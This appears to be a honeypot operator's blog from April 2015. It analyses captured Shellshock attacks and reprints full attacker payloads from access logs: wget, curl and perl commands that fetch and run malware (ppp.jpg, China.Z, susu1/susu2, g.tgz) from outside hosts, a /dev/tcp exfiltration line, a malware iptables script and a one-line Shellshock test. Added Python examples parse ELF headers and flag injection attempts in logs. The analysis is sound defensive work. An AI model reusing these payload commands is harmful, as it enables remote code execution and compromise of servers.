Saturday, 25 April 2015

perl script injection again

The same style of attack as reported some days ago hit the system again last night:

 186.56.42.11 - - [25/Apr/2015:09:11:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 477 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http//luxsocks.ru ; wget https://luxsocks.ru --no-check-certificate ; curl http//luxsocks.ru// ; curl -k https://luxsocks.ru ; lwp-download http://luxsocks.ru ; GET http://luxsocks.ru ; lynx http://luxsocks.ru ; wget http://174.122.42.230/luxx ; curl http://174.122.42.230/luxx ; fetch http://174.122.42.230/luxx ; lwp-download http://174.122.42.230/luxx ; GET http://174.122.42.230/luxx ; lynx http://174.122.42.230/luxx\");'"
Judging by the commands above (wget https://luxsocks.ru --no-check-certificate), the idea behind this attack seems to have been to download a page and replace index.html with it. Just for the record: if an index.html already exists in the download directory, wget will simply write the new one as index.html.1. If you only have an index.php, this attack might work, but it still seems odd.

The system was again hit 30 times within a short time range, so even if it had worked, it would have resulted in 30 index.html files.

When testing the link against VirusTotal, there was no result.

Thursday, 23 April 2015

Injection of perl script [UPDATE]

Tonight my system was hit 29 times by these requests:

94.136.36.227 - - [23/Apr/2015:21:36:02 +0200] "GET /phppath/cgi_wrapper HTTP/1.1" 404 474 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://88.198.96.10/wget ; curl http://88.198.96.10/curl ; fetch http://88.198.96.10/fetch ; lwp-download http://88.198.96.10/lwp-download ; GET http://88.198.96.10/GET ; lynx http://88.198.96.10/lynx \");'"
By trying the commands manually I was not able to fetch any data, so a deeper analysis of what happened or should have happened was just not possible.

When testing the link against VirusTotal, there was no result.

The origin server is hosted in Germany.

Tuesday, 21 April 2015

Shellcode injection revisited

If you have followed this blog and read the other posts, you will have seen that the attacks which could do the most harm, and which come again and again, are shellcode injections.

A good point to revisit this attack.


Shellcode injection is based on a vulnerability in Bash. This shell is the most widely used one on Linux and Unix-based operating systems, and many of them ship it as the default. The bug existed for years and was never used, maybe because nobody even knew of its existence.

In September 2014 the bug was found and the legend of this vulnerability, Shellshock, began:

http://en.wikipedia.org/wiki/Shellshock_%28software_bug%29

Today every version of bash has a fix. The only problem is that many people out there are running quite old systems which do not receive security updates any more. The good news, which many may not know, is that on most Linux systems you are able to replace bash (for example with zsh, tcsh or others), or you can use an ongoing "Long Term Support" repository such as the one Debian has just released for squeeze:

https://wiki.debian.org/LTS/Using

Another option is to compile your own version and install it from source:

https://www.gnu.org/software/bash/

So, now this bug is more than half a year old, why do we still see this many attacks in the wild?

The answer is sad and easy at the same time: this vulnerability is so easy to use!

env X='() { (a)=>\' bash -c "echo date"; cat echo
is all you need to exploit it. The "echo date"; cat echo part can be replaced with virtually any command you want, such as wget or curl, changing permissions or wiping the hard disk.



Sunday, 19 April 2015

Apache CONNECT

Since the start of the honeypot I have seen many "CONNECT <url>" entries in the access.log file. After a bit of investigation: these requests belong to mod_proxy and can be used to route a connection to the given host:port through your server if the mod_proxy module is enabled.

http://httpd.apache.org/docs/2.2/mod/mod_proxy_connect.html

Favourite targets according to my log files are:
126mx00.mxmail.netease.com:25
126mx01.mxmail.netease.com:25
126mx02.mxmail.netease.com:25
163mx00.mxmail.netease.com:25
163mx01.mxmail.netease.com:25
developer.apple.com:443
mx-tw.mail.gm0.yahoodns.net:25
vip163mx00.mxmail.netease.com:25
vip163mx01.mxmail.netease.com:25
www.alipay.com:443
www.microsoftstore.com.cn:443
According to the link above, you should run mod_proxy only if your system is hardened.

Saturday, 18 April 2015

susu1 and susu2 ELF files via php injection

Today several code injection attempts hit my honeypot.

188.138.40.254 - - [18/Apr/2015:05:37:08 +0200] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.0" 404 523 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
The two different files are there to match whichever architecture the server has:

susu1:     file format elf64-x86-64
susu1
architecture: i386:x86-64, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x0000000000103cc0

Program Header:
    LOAD off    0x0000000000000000 vaddr 0x0000000000100000 paddr 0x0000000000100000 align 2**20
         filesz 0x0000000000004494 memsz 0x0000000000004494 flags r-x
    LOAD off    0x0000000000009be0 vaddr 0x0000000000509be0 paddr 0x0000000000509be0 align 2**20
         filesz 0x0000000000000000 memsz 0x0000000000000000 flags rw-

Sections:
Idx Name          Size      VMA               LMA               File off  Algn
SYMBOL TABLE:
no symbols
and

susu2:     file format elf32-i386
susu2
architecture: i386, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x00c03e50

Program Header:
    LOAD off    0x00000000 vaddr 0x00c01000 paddr 0x00c01000 align 2**12
         filesz 0x00003631 memsz 0x00003631 flags r-x
    LOAD off    0x00000d30 vaddr 0x0804fd30 paddr 0x0804fd30 align 2**12
         filesz 0x00000000 memsz 0x00000000 flags rw-

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
SYMBOL TABLE:
no symbols
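The objdump output above (file format, architecture, start address) can be recovered from the first 64 bytes of a dropped binary without ever running it, which is what you want when triaging something like susu1 and susu2. The following ELF header parser is an added example and not part of the original post; the two sample headers it builds are constructed stand-ins that only mirror the class, machine and start address objdump reported, not the real file bytes.

```python
import struct

# ELF constants used below (values from the ELF specification)
ELFCLASS32, ELFCLASS64 = 1, 2
ELFDATA2LSB, ELFDATA2MSB = 1, 2
EM_386, EM_ARM, EM_X86_64, EM_AARCH64 = 3, 40, 62, 183
MACHINE_NAMES = {EM_386: "i386", EM_ARM: "arm", EM_X86_64: "x86-64", EM_AARCH64: "aarch64"}
TYPE_NAMES = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}


def parse_elf_header(data):
    """Decode the ELF identification bytes and file header from the start of a file.

    Only the header is read, so the sample never has to execute to reveal its class,
    machine and entry point. Raises ValueError for anything that is not a usable ELF.
    """
    if len(data) < 52 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (ELFCLASS32, ELFCLASS64) or ei_data not in (ELFDATA2LSB, ELFDATA2MSB):
        raise ValueError("unsupported ELF class or data encoding")
    endian = "<" if ei_data == ELFDATA2LSB else ">"
    if ei_class == ELFCLASS64:
        if len(data) < 64:
            raise ValueError("truncated ELF64 header")
        fmt = endian + "HHIQQQIHHH"   # e_type .. e_phnum with 64-bit field widths
    else:
        fmt = endian + "HHIIIIIHHH"   # the same fields with 32-bit widths
    (e_type, e_machine, _version, e_entry, e_phoff, _shoff,
     _flags, _ehsize, _phentsize, e_phnum) = struct.unpack_from(fmt, data, 16)
    return {
        "class": "ELF64" if ei_class == ELFCLASS64 else "ELF32",
        "endian": "little" if ei_data == ELFDATA2LSB else "big",
        "type": TYPE_NAMES.get(e_type, "unknown(%d)" % e_type),
        "machine": MACHINE_NAMES.get(e_machine, "unknown(%d)" % e_machine),
        "entry": e_entry,
        "phoff": e_phoff,
        "phnum": e_phnum,
    }


def format_name(data):
    """Return an objdump-style format name such as 'elf64-x86-64' or 'elf32-i386'."""
    header = parse_elf_header(data)
    return "%s-%s" % (header["class"].lower(), header["machine"])


def build_elf_header(is_64, machine, entry):
    """Build a minimal little-endian ELF header (constructed test data, not real malware bytes)."""
    e_ident = (b"\x7fELF"
               + bytes([ELFCLASS64 if is_64 else ELFCLASS32, ELFDATA2LSB, 1, 0])
               + b"\x00" * 8)
    if is_64:
        # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
        # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
        body = struct.pack("<HHIQQQIHHHHHH", 2, machine, 1, entry, 64, 0, 0, 64, 56, 2, 64, 0, 0)
    else:
        body = struct.pack("<HHIIIIIHHHHHH", 2, machine, 1, entry, 52, 0, 0, 52, 32, 2, 40, 0, 0)
    return e_ident + body


if __name__ == "__main__":
    # Stand-ins mirroring what objdump printed for the two droppers
    samples = {
        "susu1": build_elf_header(True, EM_X86_64, 0x103CC0),
        "susu2": build_elf_header(False, EM_386, 0xC03E50),
    }
    for name, blob in samples.items():
        info = parse_elf_header(blob)
        print("%s: %s %s %s-endian, start address 0x%x, %d program headers"
              % (name, format_name(blob), info["type"], info["endian"], info["entry"], info["phnum"]))
```

For a real sample, pass open(path, "rb").read(64) to parse_elf_header; the result should agree with file(1) and objdump -f, and a mismatch (for example a file that claims to be ELF but fails the class check) is itself worth noting in the write-up.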

Clamav hashes (md5 and sha256)
  • 5bc85adb6368be6a5321238377802ffd:18248:susu1
  • 381ea0197f00afe0d8e26bb48b71254b:14492:susu2
  • 5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af:14492:susu2
  • 3a4f90405832615a5dbe59c64e6de50c2a1a3e9b372a8605daf60960d4bef016:18248:susu1
I saw 56 attempts coming from the same source, 188.138.40.254; the origin country is Germany.


Friday, 17 April 2015

Wireshark via remote

From time to time I like to get an overview of what happens in the network of my virtual server. As I am a huge fan of Wireshark, it is my weapon of choice for doing so.

A long time ago I started these investigations by creating a dump file on the remote host and copying it to my local machine.

But that is really not the best way to do it, so I want to share this little shell command:

ssh <username>@<remote_host> sudo tcpdump -s0 -w -  | wireshark -k -i -
If you use Windows and Cygwin, the Wireshark call would look like

/cygdrive/c/Program\ Files/Wireshark/Wireshark.exe -k -i -

This runs tcpdump on the remote host and does the analysis via Wireshark on your local machine.

Normally I use some options, as I want to reduce the traffic going over the wire. Of course you could filter within Wireshark, but why use so much bandwidth?

sudo tcpdump -s0 -w - 'not port 22 and host <host> and not port 53'

  • not port 22: as my own ssh traffic is going over port 22 as well, it is a good idea not to capture it
  • host <host>: I do not want to see all traffic in the network, only the traffic related to my own server
  • not port 53 (DNS): just an example; many tools (like Apache, MySQL, ClamAV) perform DNS lookups and I do not want to see them
There are some steps you should take before you can use the statement above:
  • create an ssh key so you can log in without a password
  • add the user to the sudoers file, best with the NOPASSWD option

Thursday, 16 April 2015

Mid-Month Report April 2015

This is the monthly review of my honeypot for April 2015. It is based on data taken from the Apache log files. The tool used to process the data is mypyfwa.py, which is part of MyPythonApacheFirewall, a project I started on GitHub some time ago.


In its current state, the analysis script extracts requests based on four different types:
  • PATH: the request contains more than three "/"
  • SCANNER: one of the blacklisted scanners (Zeus, masscan, etc.) was used
  • SHELLinjection: wget or curl was used within the query
  • SQLinjection: a string containing SQL syntax was used
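To make the four categories concrete, and to tie them back to the Shellshock log lines and the CONNECT entries discussed in the posts above, here is a small standalone log analyser in Python. It is an added example and is not mypyfwa.py or any other code from the MyPythonApacheFirewall project. It assumes Apache's combined log format, the scanner blacklist is an assumed short list (the post only names Zeus and masscan), and the sample log is constructed for this example: two lines are shortened copies of the Shellshock requests quoted in the posts, the rest (10.0.0.x sources, the SQL and scanner hits) are invented.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache "combined" log format. Quoted fields may contain \" and \\ escapes,
# exactly as in the Shellshock lines quoted in the posts above.
QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>' + QUOTED + r')" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>' + QUOTED + r')" "(?P<agent>' + QUOTED + r')"'
)

# Markers for the four report categories plus the Shellshock header prefix
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:;\s*\}\s*;')
FETCH_RE = re.compile(r'\b(?:wget|curl)\b')
URL_RE = re.compile(r'https?://[^\s;"\'\\]+')
SQL_RE = re.compile(r'(?i)\b(?:union\s+select|select\s+.+\s+from|insert\s+into|drop\s+table|or\s+1=1)\b')
SCANNER_BLACKLIST = ("masscan", "zeus", "zmeu", "nikto")   # assumed list; the post names Zeus and masscan

# Constructed sample log (see the lead-in); the first two lines are trimmed copies of real entries
SAMPLE_LOG = r'''
186.56.42.11 - - [25/Apr/2015:09:11:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 477 "-" "() { :;};/usr/bin/perl -e 'print \"XSUCCESS!\";system(\"wget http://luxsocks.ru ; curl http://174.122.42.230/luxx\");'"
27.17.5.140 - - [12/Apr/2015:14:10:20 +0200] "GET / HTTP/1.1" 404 442 "-" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-wxvm >> /tmp/Run.sh\""
10.0.0.5 - - [19/Apr/2015:11:02:09 +0200] "CONNECT 163mx00.mxmail.netease.com:25 HTTP/1.1" 405 0 "-" "-"
10.0.0.5 - - [19/Apr/2015:11:02:10 +0200] "CONNECT www.alipay.com:443 HTTP/1.1" 405 0 "-" "-"
10.0.0.6 - - [19/Apr/2015:12:00:00 +0200] "GET /a/b/c/d/e.php HTTP/1.1" 404 300 "-" "Mozilla/5.0"
10.0.0.7 - - [19/Apr/2015:12:01:00 +0200] "GET /index.php?id=1%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
10.0.0.8 - - [19/Apr/2015:12:02:00 +0200] "GET / HTTP/1.1" 200 500 "-" "masscan/1.0"
'''


def parse_line(line):
    """Split one access.log line into its fields; return None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split(" ")
    rec["method"] = parts[0]
    rec["path"] = unquote(parts[1]) if len(parts) > 1 else ""   # decode %20 etc. before matching
    return rec


def classify(rec):
    """Return the set of report categories a request falls into."""
    tags = set()
    fields = " ".join((rec["path"], rec["referer"], rec["agent"]))
    if rec["path"].count("/") > 3:                                   # PATH: more than three "/"
        tags.add("PATH")
    if any(name in rec["agent"].lower() for name in SCANNER_BLACKLIST):
        tags.add("SCANNER")
    if FETCH_RE.search(fields) or SHELLSHOCK_RE.search(fields):     # wget/curl or the "() { :;};" prefix
        tags.add("SHELLinjection")
    if SQL_RE.search(fields):
        tags.add("SQLinjection")
    return tags


def analyze(log_text):
    """Count categories, collect download URLs from Shellshock payloads, and tally CONNECT targets."""
    report = {"counts": Counter(), "shellshock": [], "connect_targets": Counter()}
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for tag in classify(rec):
            report["counts"][tag] += 1
        if rec["method"] == "CONNECT":
            report["connect_targets"][rec["path"]] += 1
        payload = rec["referer"] + " " + rec["agent"]
        if SHELLSHOCK_RE.search(payload):
            # the URLs handed to wget/curl/fetch are the indicators worth blocking and looking up
            report["shellshock"].append((rec["ip"], URL_RE.findall(payload)))
    return report


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    print("counts:", dict(result["counts"]))
    print("CONNECT targets:", dict(result["connect_targets"]))
    for ip, urls in result["shellshock"]:
        print("shellshock from %s -> %s" % (ip, ", ".join(urls)))
```

Feeding a real access.log through analyze() gives the per-category counts for this kind of report, the "favourite targets" list of the CONNECT post as a Counter, and the download URLs from every Shellshock payload ready for a VirusTotal lookup or a block list.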
 

Attacker by Countrycode

Wednesday, 15 April 2015

ppp.jpg (perl based malware) Addbot

On the 7th of April a shellcode injection attempt hit my system.
The target was to download and execute perl-based malware.
46.4.73.171 - - [07/Apr/2015:03:54:15 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo 109.234.106.8/ ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo 109.234.106.8/ ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo 109.234.106.8/ ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo 109.234.106.8/ ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""
The ppp.jpg file is actually a perl script.
Driven by my basic knowledge of perl, I would assume that it is an IRC-controlled bot used to access Google and other search engines to ensure a better page ranking.

For more details please visit VirusTotal.

Unknown pm malware (Samba related)

On the 13th of April a shellcode injection attempt hit my system. The target was to download and run Samba-related malware.

46.4.73.171 - - [13/Apr/2015:06:04:07 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo ;cd /var/tmp;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21 echo ;cd /var/spool/samba;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21\"" "() { :;}; /bin/bash -c \"echo ;cd /var/tmp;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21 echo ;cd /var/spool/samba;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21\""
The g.tgz includes a directory with two files:
  • pm: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, stripped
  • a: an iptables script file:
/sbin/ifconfig |grep inet |grep -v inet6 |grep -v 127.0.0.1 |tr ':' ' ' |awk '{print $3}' >> ip
chmod +x pm
for i in `cat ip`
do
./pm -i"$i" -e"$i" -p3838 -d
done
/sbin/iptables -I OUTPUT -p tcp --dport 25 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 25 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I OUTPUT -p tcp --dport 3838 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 3838 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I OUTPUT -p tcp --dport 587 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 587 -j ACCEPT >/dev/null 2>&1

/sbin/iptables-save

For further details please visit VirusTotal.

China.Z malware

On the 12th of April my honeypot server received an attempted shell injection attack.
The target was to download and run the China.Z malware.

27.17.5.140 - - [12/Apr/2015:14:10:20 +0200] "GET / HTTP/1.1" 404 442 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-wxvm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wxvm >> /tmp/Run.sh;echo /tmp/China.Z-wxvm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-wxvm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wxvm >> /tmp/Run.sh;echo /tmp/China.Z-wxvm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
Today the malware was no longer available for download, so if you need additional information please go to VirusTotal.

The source IP is located in China.